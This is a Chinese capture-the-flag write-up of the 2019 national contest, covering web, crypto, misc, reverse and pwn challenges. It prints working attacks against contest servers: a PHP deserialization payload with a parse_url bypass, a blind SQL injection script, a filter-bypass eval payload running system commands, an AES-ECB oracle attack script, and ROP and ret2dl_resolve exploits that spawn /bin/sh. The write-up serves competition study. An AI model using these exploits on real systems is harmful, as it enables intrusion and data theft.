2019国赛部分题目WP---NEX的小老妹
2019国赛部分题目WP---NEX的小老妹
签到题
三个人面向摄像头,得到flag
flag{87e37d95-6a48-4463-aff8-b0dbd27d3b7d}
WEB
JustSoso
根据提示,可能存在文件包含 尝试一下php://filter/convert.base64-encode/resource=index.php 打到源码 index.php
<?phperror_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
$payload = unserialize($payload);
}else{
echo "Missing parameters";
}
?>hint.php
<?php
class Handle{
private $handle;
public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}
public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}
class Flag{
public $file;
public $token;
public $token_flag;
function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
}
public function getFlag(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}
?>首先查看过滤 $url=parse_url($_SERVER['REQUEST_URI']);这里很有意思,用 parse_url去处理URI,存在一个bug,可以用 ///绕过参考http://www.am0s.com/functions/406.html 然后是反序列化 Handleclass在析构的时候会调用 handle的 getFlag方法,所以可以传 Flagclass,然后需要绕过 $this->token===$this->token_flag,尝试用引用绕过, Handleclass 在 __wakeup()时会把参数清掉,也需要绕过,用 CVE-2016-7124绕过即可,还有 $handle 是 private,需要加上 %00, urlencode即可 生成序列化的php代码
$f=new Flag("flag.php");
$f->token=&$f->token_flag;
$a=new Handle($f);
$as=serialize($a);
echo urlencode($as)."<br>";
echo $as;payload:
>///index.php?file=hint.php&payload=O%3A6%3A"Handle"%3A2%3A%7Bs%3A14%3A"%00Handle%00handle"%3BO%3A4%3A"Flag"%3A3%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3Bs%3A5%3A"token"%3Bs%3A32%3A"50abc3e730e36b387ca8e02c26dc0a22"%3Bs%3A10%3A"token_flag"%3BR%3A4%3B%7D%7D>flag{bdf9c526-1d57-4eb4-9ec7-d9198e2e987c}最简单的sql注入
sleep,or,if,|,BENCHMARK被替换为QwQ,时间盲注基本不行,只能尝试布尔盲注,这里有一个点, pow(1,22222222)=1, pow(0,2222222)会报错,根据页面回显就可以实现布尔盲注,脚本如下:
#coding=utf-8import requestsimport stringexp = "a' and pow(((ascii(mid((select group_concat(b) from (select 'a','b' union select * from user)a),{1},1))={0})+1),222222222);#"url = "http://39.97.227.64:52105/" user = ''while True: for j in range(10000): print j for i in string.digits+string.letters+"!@#$%^&*()_+-/={[}]|,.`~": expt = exp.format(ord(i),j) #print expt data = { 'username' : expt, 'password' : "passwd" }
res = requests.post(url, data = data) if "操作" in res.content: if i=="'": continue user = user + i print user break得到登陆密码
想到了DDCTF的mysql弱口令那个任意文件读取的题,参考一下https://www.anquanke.com/post/id/106488用一下脚本:[https://github.com/allyshka/Rogue-MySql-Server](https://github.com/allyshka/Rogue-MySql-Server )
改一下路径,然后查看路径就可以了
最终得到flag
flag{3f4abe8b-aa4a-bb48-c2f9f04d045beade} Love math 查看源码,发现调用了calc.php,访问一下,可以看到源码
最终有eval命令执行,大致思路就是绕过黑名单和利用白名单,执行命令 想到之前p神写过的不用字母数字写shell的博客,和先知上的骚操作https://xz.aliyun.com/t/3537 用baseconvert去写命令 baseconvert(1751504350,10,36)(base_convert(784,10,36)),(system(ls))发现有回显
尝试读文件,发现无法绕过空格和长度限制,而且可以利用的点很少,只能利用白名单 可以把白名单内的函数名当作字符串来操作,爆破一下可以异或得到 ‘*’
<?php error_reporting(0); $list1=['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh']; $list2=['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for ($x=0; $x<=count($list1); $x++) { for ($y=0; $y<=count($list2); $y++){ for ($z=0; $z<=20; $z++){ $c = (dechex($z)^$list1[$x]^$list2[$y]); if($c == " *"){ echo $list1[$x]." ".$list2[$y]." ".$z; echo "<br>"; } } } }得到了 atan^pow^dechex(17)=' *' 可以构造最终读文件的payload base_convert(1751504350,10,36)(base_convert(15941,10,36).(atan^pow^dechex(17))) 然后读一下源码就可以了
flag{652bc92a-ea94-443f-98ee-2cab5c3c90b8}
Crypto
puzzles
question 0:扔进wolframalpha里解一下
question 1:给了4个,有三个数,试着搜一下,发现一个网站http://prime389.blog70.fc2.com/?m&no=101,发现全是素数,写个代码看下位置
a=''' 26364809, 26364823, 26364827, 26364847, 26364881, 26364889, 26364893, 26364901, 26364931, 26364941, 26364967, 26364983, 26364991, 26364997, 26365007, 26365021, 26365037, 26365039, 26365049, 26365057, 26365081, 26365099, 26365109, 26365111, 26365123, 26365133, 26365139, 26365169, 26365177, 26365187, 26365231, 26365243, 26365289, 26365301, 26365333, 26365363, 26365393, 26365399, 26365403, 26365421, 26365463, 26365511, 26365517, 26365519, 26365523, 26365541, 26365561, 26365601, 26365607, 26365621, 26365643, 26365649, 26365681, 26365721, 26365733, 26365741, 26365771, 26365777, 26365783, 26365789, 26365799, 26365811, 26365817, 26365819, 26365873, 26365877, 26365883, 26365891, 26365909, 26365943, 26365987, 26365991, 26366003, 26366023, 26366033, 26366059, 26366071, 26366077, 26366117, 26366141, 26366147, 26366149, 26366159, 26366173, 26366189, 26366203, 26366227, 26366231, 26366233, 26366273, 26366287, 26366317, 26366323, 26366341, 26366369, 26366383, 26366393, 26366407, 26366419, 26366429, 26366447, 26366453, 26366477, 26366491, 26366497, 26366503, 26366537, 26366551, 26366581, 26366591, 26366603, 26366621'''print(a.replace("\n","").replace(" ","").split(",").index('26364809'))print(a.replace("\n","").replace(" ","").split(",").index('26366033'))print(a.replace("\n","").replace(" ","").split(",").index('26366621'))发现可能是等差数列,推测是 26365399 question 2:高数题,队内学霸做一下就好了, 7700 question 3:大物题,磁通量 Φ=BS=B*pi*r*r=16pi 电动势 E=(deltaΦ)/(delta t)=2*pi*r*B*(dr/dt)=80*pi=(part3*pi)/233part3=18640 question 4:高数题,搜题软件搜一下,得到结果, part4=40320
flag{01924dd7-1e14-48d0-9d80-fa6bed9c7a00} warmup 安恒杯10月份一道密码原题,通过nc我们可以得到(我们输入明文)的AES或者(我们输入的明文+flag)的AES。本题的AES加密为ECB,16个字符为一组。所以我们考虑一下问题:假设flag为
flag{xxxxxxxxx}。当我们输入123456789012345的时候,输入的个数为15位,这样flag里面的内容就需要向前补一位,实际上第一组加密的字符串可能是123456789012345f。然后我们再加密123456789012345f,如果两次加密的前16位得出的结果一样的话,这就证明flag的第一位就是f。我们先试验一下。
然后就可以编写脚本跑了,脚本如下
import socketHOST = '08560bfda40f2691789fc1b246a80c4e.kr-lab.com'PORT = 54321s = Nonesock = socket.socket()sock.connect((HOST,PORT))szBuf = sock.recv(1024)print(szBuf)t=str(2222222222222)+'\n'b1=t.encode(encoding='utf-8')sock.send(b1)szBuf = sock.recv(1024)print(szBuf)t=str('1234567890')+'\n'b1=t.encode(encoding='utf-8')sock.send(b1)szBuf = sock.recv(1024)print(szBuf)print szBuftemp='{-1234567890}abcdefghijklmnopqrstuvwxyz_?#@!'payload=str('00000000000000000000000000000000012345678912345')
x=''for j in range(1,60): for i in temp: print i t=(str(payload)+'\n').encode(encoding='utf-8') print "-----------" print payload print payload+x+i print "-----------" sock.send(t) szBuf = sock.recv(1024) xxx = str(szBuf[0:103]) ppp=payload+x+i+'\n' p = ppp.encode(encoding='utf-8') sock.send(p) szBuf = sock.recv(1024) yyy = str(szBuf[0:103]) if cmp(xxx, yyy) == 0: print x+"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" x=x+i payload=payload[0:47-j] print payload break最终得到flag
Asymmetric
刚开始的题目不对,给的py文件中导入了flag但是没用到,以为有什么骚操作,,gmpy2.iroot求出来p,然后求d,直接解密即可,代码如下
e=58134567416061346246424950552806959952164141873988197038339318172373514096258823300468791726051378264715940131129676561677588167620420173326653609778206847514019727947838555201787320799426605222230914672691109516799571428125187628867529996213312357571123877040878478311539048041218856094075106182505973331343540958942283689866478426396304208219428741602335233702611371265705949787097256178588070830596507292566654989658768800621743910199053418976671932555647943277486556407963532026611905155927444039372549162858720397597240249353233285982136361681173207583516599418613398071006829129512801831381836656333723750840780538831405624097443916290334296178873601780814920445215584052641885068719189673672829046322594471259980936592601952663772403134088200800288081609498310963150240614179242069838645027877593821748402909503021034768609296854733774416318828225610461884703369969948788082261611019699410587591866516317251057371710851269512597271573573054094547368524415495010346641070440768673619729280827372954003276250541274122907588219152496998450489865181536173702554116251973661212376735405818115479880334020160352217975358655472929210184877839964775337545502851880977049299029101466287659419446724781305689536816523774995178046989696610897508786776845460908137698543091418571263630383061605011820139755322231913029643701770497299157169690586232187419462594477116374977216427311975598620616618808494138669546120288334682865354702356192972496556372279363023366842805886601834278434406709218165445335977049796015123909789363819484954615665668979L n=754600786340927688096652328072061561501667781193760284816393637647032362908189628005150802929636396969230958922073774180726205402897453096041624408154494621307262657492560975357997726055874834308239749992507552325614973631556754707427580134609221878324704469965450463088892083264951442562525825243127575048386573246756312509362222667015490013299327398464802116909245529065994770788125182846841016932803939806558559335886481214931253578226314057242462834149031625361286317307273138514126289052003214703248070256059405676891634792175775697355408418965738663732479622148276007308404691800186837579126431484536836513358124181380166971922188839934522356902295160649189850427580493328509329115798694580347461641487270793993129066433242544366683131231903590153844590595882428219010673818765995719694470668924781499987923250883546686344997580959954960334567874040563037167422839228466141912000421309282727363913908613116739074234989825489075148091144771967111113068647060175231126374070143480727000247378471525286907200601035581143391602569836131345909055708005758380081303860198696570649330092070410465978479841469533490522594827330661914537170063053059393550673731195548189192109328158876774080143171304333338291909598353550442855717204721L p=27469997931214477761614767108186031567315036376083132392426996667627218749539695067248042591583909179084701435672160685775817300735625565681316931013796736475063262607704602169127345932808228340127651954510616128241670424036014879415455623394081339453271845448205451563064839423245503714379366851744076108861445013040104633032165239781810818675751597470203543193701129345733547475908441315395948934439272351686827840533139470474080751283584826092493989661762657864506486606709856249052957276749808634865316990803862670123015171486148705503812500313554891199205784097280219458478633286017402718458309597972808845785689L p1=165740755190793304655854506052794072378181046252118367693457385632818329041540419488625472007710062128632942664366383551452498541560538744582922713808611320176770401587674618121885719953831122487280978418110380597358747915420928053860076414097300832349400288770613227105348835005596365488460445438176193451867L c='''YXmuOsaD1W4poLAG2wPrJ/nYZCkeOh2igCYKnZA6ecCeJadT6B3ZVTciPN6LJ8AcAsRXNnkC6+9P NJPhmosSG5UGGbpIcg2JaZ1iA8Sm3fGiFacGvQsJOqqIWb01rjaQ3rDBKB331rrNo9QNOfMnjKr0 ejGG+dNObTtvnskICbYbNnSxMxLQF57H5JnWZ3LbbKQ493vmZzwvC6iH8blNPAp3dBlVzDqIAmxm Ubk0OzFjPoHphD1oxHdzXyQNW+sLxVldrf9xcItq92jN5sqBYrG8wADIqY1/sqhTMZvkIYFMHqoM QuiRSnVrCF2h2RtGDEayLo0evgXI/0W3YveyKCHViOnG6wypcBFm91ZWdjp3fVW/4DyxW6xu9hg/ NlXyRP6pT/OyQpcyTqKRuiXJLWgFUJI/8TRgyAjBLLgSd3U0N3VM8kewXw5j+fMUTCW9/Gy4iP8m 52Zabx/vEKdwdGZ0QyvgvAWGUFZ96EK0g1BM/LU9Tuu2R+VKcCSCprg283x6NfYxmU26KlQE6Zrr jLmbCOe0327uaW9aDbLxZytPYIE5ZkzhSsD9JpQBKL30dCy3UKDbcuNgB6SrDddrbIuUd0/kLxuw h6kTqNbC4NDrOT4WAuP4se8GGOK8Wz0dL6rE6FkzMnI4Qg501MTSNQZ4Bp7cNf6H9lTa/4DNOl0=''' d=gmpy2.invert(e,p14-p13)
import gmpy2 import random from Crypto.Util.number import * import base64 # n=p**r p=gmpy2.iroot(n,2) print p print gmpy2.gcd(e,p) print p1**4-p1**3 print long_to_bytes(pow(bytes_to_long(base64.b64decode(c)),d,n))Simple
Round n part_encode-> 0x92d915250119e12bKey map -> 0xe0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84根据问题的txt内容,我们尝试以下步骤:猜测part_encode是加密到第n轮的密文,key map是16个subkey集合。由此我们得到subkey集合:
subkey = []for i in range(16): sub = keymap[6*i: 6+6*i] subkey.append(str_to_bit(sub))我们设参数n,表示partencode是加密到第n轮的密文。要得到flag,我们需要进行16-n轮的解密。由于partencode是加密到第n轮的密文,所以我们不需要对前n轮的密文解密,只需要使用第n轮到第16轮的密钥进行解密。以下为主函数:
if __name__=="__main__": for n in range(15): #猜测n part_encode = '92d915250119e12b'.decode('hex') keymap = 'e0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84'.decode('hex') subkey = [] for i in range(16): sub = keymap[6*i: 6+6*i] subkey.append(str_to_bit(sub)) #得到子密钥 crypto=str_to_bit(part_encode) l, r = split(crypto, 32) r, l = split(crypto, 32) result = [] #开始解密 for i in range(16): if i < n: #不使用前n轮的子密钥解密 continue r_ebox = get_across_ebox(r) r_xor = xor(subkey[15-i], r_ebox) r_sbox = get_across_sbox(r_xor) r_pbox = get_across_pbox(r_sbox) r_xor1 = xor(l, r_pbox) l = r r = r_xor1 result = result+ final_transposition(r+l) final = bit_to_str(result) print ("flag{%s}"%final) #输出结果完整代码如下:
from io import *import refrom binascii import *
#PC-1变换矩阵,输出56个比特位PC_1= [57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4]
#LSC,密钥左移次数LSC_num=[1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
#PC-2变换矩阵,输出48个比特位PC_2= [14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32]
#Initial Transposition,输出64个比特位IT= [58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7]
#EBox,输出48个比特位EBox= [32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1]
#SBox,box1-box8,输出32个比特位
SBox1=[[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7], [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8], [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0], [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]]
SBox2=[[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10], [3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5], [0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15], [13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]]
SBox3=[[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8], [13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1], [13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7], [1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]]
SBox4=[[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15], [13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9], [10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4], [3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]]
SBox5=[[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9], [14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6], [4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14], [11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]]
SBox6=[[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11], [10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8], [9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6], [4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]]
SBox7=[[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1], [13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6], [1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2], [6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]]
SBox8=[[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7], [1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2], [7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8], [2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]]SBox=[SBox1,SBox2,SBox3,SBox4,SBox5,SBox6,SBox7,SBox8]#PBox,输出32个比特位PBox= [16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25]
#Final Transposition,输出64个比特位FT=[40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25]
#将列表分成大小为n的子列表def split(s, n): return [s[k:k+n] for k in range(0, len(s), n)]
#对明文进行initial transpositiondef initial_transposition(plain): plain_it=[plain[IT[i]-1] for i in range(64)] return plain_it
#E盒置换def get_across_ebox(plain_it_r): plain_ebox=[plain_it_r[EBox[i]-1] for i in range(48)] return plain_ebox
#将十进制转换位4位的二进制字符串def dec_to_4bin(dec): res=bin(dec).replace('0b','') fix=(4-len(res))*'0' return fix+res
#二进制转strdef bit_to_str(array): res = ''.join([chr(int(j,2)) for j in [''.join([str(i) for i in bytes]) for bytes in split(array,8)]]) return res
#S盒置换def get_across_sbox(plain_ebox): plain_sbox=[] for i in range(8): subplain=plain_ebox[i*6:i*6+6] row=int(str(subplain[0])+str(subplain[-1]),2) col=int(str(subplain[1])+str(subplain[2])+str(subplain[3])+str(subplain[4]),2) plain=SBox[i][row][col] plain_sbox.append(dec_to_4bin(plain)) return [int(x) for x in ''.join(plain_sbox)]
#P盒置换def get_across_pbox(plain_sbox): plain_pbox=[plain_sbox[PBox[i]-1] for i in range(32)] return plain_pbox
#final transpositiondef final_transposition(plain): crypto=[plain[FT[i]-1] for i in range(64)] return crypto
#异或def xor(m,n): return [a^b for a,b in zip(m,n)]
#str转二进制def str_to_bit(text): array = list() for char in text: binval = char_to_bin(char, 8) array.extend([int(i) for i in list(binval)]) return array
#字符转二进制def char_to_bin(val, bitsize): bin_val = bin(val)[2:] if isinstance(val, int) else bin(ord(val))[2:] if len(bin_val) > bitsize: print ("error") while (len(bin_val)-bitsize): bin_val = "0"+bin_val #padding 0位 return bin_val
if __name__=="__main__": for n in range(15): #猜测n part_encode = '92d915250119e12b'.decode('hex') keymap = 'e0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84'.decode('hex') subkey = [] for i in range(16): sub = keymap[6*i: 6+6*i] subkey.append(str_to_bit(sub)) #得到子密钥 crypto=str_to_bit(part_encode) l, r = split(crypto, 32) r, l = split(crypto, 32) result = [] #开始解密 for i in range(16): if i < n: #不使用前n轮的子密钥解密 continue r_ebox = get_across_ebox(r) r_xor = xor(subkey[15-i], r_ebox) r_sbox = get_across_sbox(r_xor) r_pbox = get_across_pbox(r_sbox) r_xor1 = xor(l, r_pbox) l = r r = r_xor1 result = result+ final_transposition(r+l) final = bit_to_str(result) print ("flag{%s}"%final)#输出结果运行结果为:
最终flag:
flag{y0ur9Ood} Misc saleae 用
SaleaeLogic打开,设置一下
flag: flag{12071397-19d1-48e6-be8c-784b89a95e07}
24C
用 SaleaeLogic打开之后,设置I2C协议。
发现三段flag
先还原flag,然后提交了多次,发现错误。然后发现有一个0x09的地方,意思是先将原来的flag排出来,然后在第9个字符的位置,用ac替换9e,最终得到flag
最终flag为 flag{c46d9e10-e9b5-4d90-a883-41cf163bdf4e} usbasp 同样用工具打开,放大查看,确定每个channel对应的信息,设置一下,得到flag
flag值为:flag{85b084c6-42e6-495c-87b4-46dfb1df58a0} Reverse easyGO 用IDAGolangHelper恢复函数表
索引printrln 找到输出
交叉索引找到main,将字符串经过stringtoslicebyte、slicebytetostring、base64后与输入验证
直接在内存中找到运算后的字符就是flag
最终flag:flag{92094daf-33c9-431e-a85a-8bfbd5df98ad} PWN your_pwn 扔IDA里,main函数里边没问题,但是调用的函数里V1大小没限制的漏洞可以利用。
通过这个漏洞可以泄露 + 更改栈 开始写exp 因为开了canary,所以可以先把返回地址(rbp + 8)找到
所以可以在程序中泄露出main+AC的地址,也就有程序基地址了。dedef hack(index, value): if(value == 0): p.recvuntil('input index\n') p.sendline(str(index)) p.recvuntil('now value(hex) ') result = p.recvline()[:-1] p.sendlineafter('input new value\n', str(int(result, 16))) return result[-2:] else: p.recvuntil('input index\n') p.sendline(str(index)) p.recvuntil('now value(hex) ') result = int(p.recvline()[:-1], 16) p.sendlineafter('input new value\n', str(value)) return result #这个return其实没用到,但是这么写好看啊(O_O)
ret_addr = int(hack(0x15f, 0)+hack(0x15e, 0)+hack(0x15d, 0)+hack(0x15c, 0)+hack(0x15b, 0)+hack(0x15a, 0)+hack(0x159, 0)+hack(0x158, 0), 16)elf.address = ret_addr - 0xb11得到基地址就可以构建rop链了。
rop链里边的pop|ret要选牵涉寄存器最少、不能动rbp的pop,所以选择了在正中间的0d03。通过ropgadget找到popret的地址就有函数的返回地址了,再构造一个puts(puts)用puts函数打出puts的真实地址,就能获得libc基址。(这里的libc版本是试了2.27之后盲猜的2.23版本) (过程中要注意次数,过了0x28次就要输入'yes'使程序继续进行) def hackaddr(index, addr): base = 0x158 + index * 8 hack(base, addr & 0xff) hack(base + 1, (addr >> 0x8) & 0xff) # (这里调用的hack函数在上边,为了更 hack(base + 2, (addr >> 0x10) & 0xff) # 好说明思路把它拆开了。) hack(base + 3, (addr >> 0x18) & 0xff) hack(base + 4, (addr >> 0x20) & 0xff) hack(base + 5, (addr >> 0x28) & 0xff) hack(base + 6, (addr >> 0x30) & 0xff) hack(base + 7, (addr >> 0x38) & 0xff) return index + 1
pop_ret = elf.address + 0xd03puts_addr = elf.symbols['puts']puts_got = elf.got['puts']hack_addr(hack_addr(hack_addr(hack_addr(0, pop_ret), puts_got), puts_addr), ret_addr)hack(0, 0)p.sendafter('do you want continue(yes/no)? \n', 'yes')libc.address = u64(p.recvline()[:-1].ljust(8, '\x00')) - puts_addr最后只要空跑33遍,再把返回地址改成libc里面的onegadget的地址加上libc基址就能成功getshell。(空跑33遍为了凑足0x28遍好结束) hackaddr(0, libc.address + 0xf1147) for i in range(33): hack(0, 0) p.interactive() 最终exp截图:
baby_pwn
扔IDA打开
源程序贼简单栈溢出很清楚,但没输出。
Checksec之后发现只有NX,基本可以断定是return to dl_resolve 开始写exp 把栈迁移到bss段再返回vuln函数 buf1 = 'A' * offset
buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)
之后calldl_Resolve()并且填充假数据
buf2 = rop.string('/bin/sh')
buf2 += rop.fill(20, buf2)
buf2 += rop.dl_resolve_data(addr_bss+20, 'system')
buf2 += rop.fill(100, buf2)
p.send(buf2)
使用dl_resolve_call 调用system(“/bin/sh”),成功getshell
buf3 = 'A'*44 + rop.dl_resolve_call(addr_bss+20, addr_bss)
p.send(buf3)最终exp截图
flag{b8313ecb06a0fd2742315678634161b5}